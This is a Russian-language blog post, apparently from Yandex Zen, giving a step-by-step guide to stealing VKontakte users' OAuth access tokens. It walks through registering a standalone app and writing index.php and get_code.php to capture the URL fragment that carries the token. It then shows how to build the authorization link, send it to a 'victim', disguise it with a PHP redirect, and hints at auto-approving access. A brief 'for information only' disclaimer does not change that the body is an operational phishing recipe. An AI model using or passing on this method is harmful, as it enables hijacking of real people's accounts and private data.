Добрый день, дорогие читатели. На связи Вадим Юрко. В данной статье я расскажу о том, как можно очень легко получить токен любого пользователя в социальной сети ВКонтакте.
Думаю, многие пытались реализовать этот способ, но почти ни у кого не получалось. В чем проблема? Я отвечу. Перед написанием этой статьи я изучил несколько топиков на эту тему. И у всех одна и та же проблема: "Получить текст после знака решетки невозможно". Дескать, "параметры GET - для сервера. А вот якоря на сервере получить невозможно". Вы уверены? :)
Самая большая уязвимость в любой системе - это конечно же человек. И в нашей программе основную роль будет играть именно человек. Ну, без лишних слов, начнем.
Внимание! Данная статья не является побуждением к действию. Вся информация представлена только для ознакомления. Цель автора - донести об этой проблеме общественности!
Создание приложения
Для получения токена, нам перво наперво надо создать наше приложение. Для этого переходим по ссылке https://vk.com/apps и нажимаем на кнопку "Создать приложение". В поле "Название" мы вводим любое название, тип приложения указывает Standalone-приложение.
Нажимаем "Подключить приложение".
Далее нам нужно перейти в раздел "Настройки".
Все настройки выставляем как показано на скрине.
Нажимаем "Сохранить изменения".
Теперь перейдем непосредственно к коду.
Написание кода
Открываем наш любимый редактор и создаем файл index.php. На этот файл в дальнейшем будет присылаться сам токен. Пишем код:
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js">
<script type="text/javascript">
var url = document.location.href;
$.get("get_code.php", {url: url},
function (data) {
document.write(data);
}
);
</script>
Прошу прощения за столь рукожопский нелицеприятный код, Дзен не дает вставить по-другому.
Думаю, что делает этот код - понятно и так, и объяснять это не нужно.
Теперь создаем файл get_code.php. Этот файл будет обрабатывать полученные данные. В него мы пишем следующее:
<?php
$url = $_GET['url'];
echo "> Адрес сайта: " . $url;
?>
Как вы видите, все на самом деле очень просто.
Я не буду объяснять такие пустяки как, например, выделение токена из URL. Думаю, сами разберетесь. Не маленькие.
Генерация ссылки
Все, что нам осталось сделать, это получить ссылку, с помощью которой мы будем получать токен. Пример такой ссылки:
https://oauth.vk.com/authorize?client_id=ТУТ_НАШ_КЛЮЧ&display=page&scope=РАЗРЕШЕНИЯ&redirect_uri=ТУТ_ССЫЛКА_НА_index.php&response_type=token&v=5.103
На место ключа нужно вставить ID приложения. Он указан в настройках приложения.
Подробнее о разрешениях (полный список) вы можете узнать тут.
Внимание! Домен, на котором лежит index.php должен быть именно тем, что мы указали в настройках приложения. Домен целиком, начиная от https:// и заканчивая названием папки.
Приводим механизм в действие
Теперь осталось скинуть полученную ссылку нашей жертве. И, если она перейдет по ней и нажмет на кнопку "Разрешить" - ее токен будет у нас в кармане. Так же можно замаскировать ссылку. Например:
<?php
header("Location: https://НАША ССЫЛКА");
?>
Так же, если немного допилить код, можно написать автоматическое разрешение авторизации. Т.е. у пользователя не будет выбора, разрешить доступ к странице, или нет. Тогда даже комар носу не подточит. Но это уже совсем другая история.
Заключение
В этой статье я рассказал, как можно легко получить токен любого пользователя ВКонтакте. Надеюсь, вы поняли, как работает эта система и не будете попадаться на уловки мошенников.
Если у вас остались еще какие-то вопросы - задавайте их в комментариях. Постараюсь ответить на все.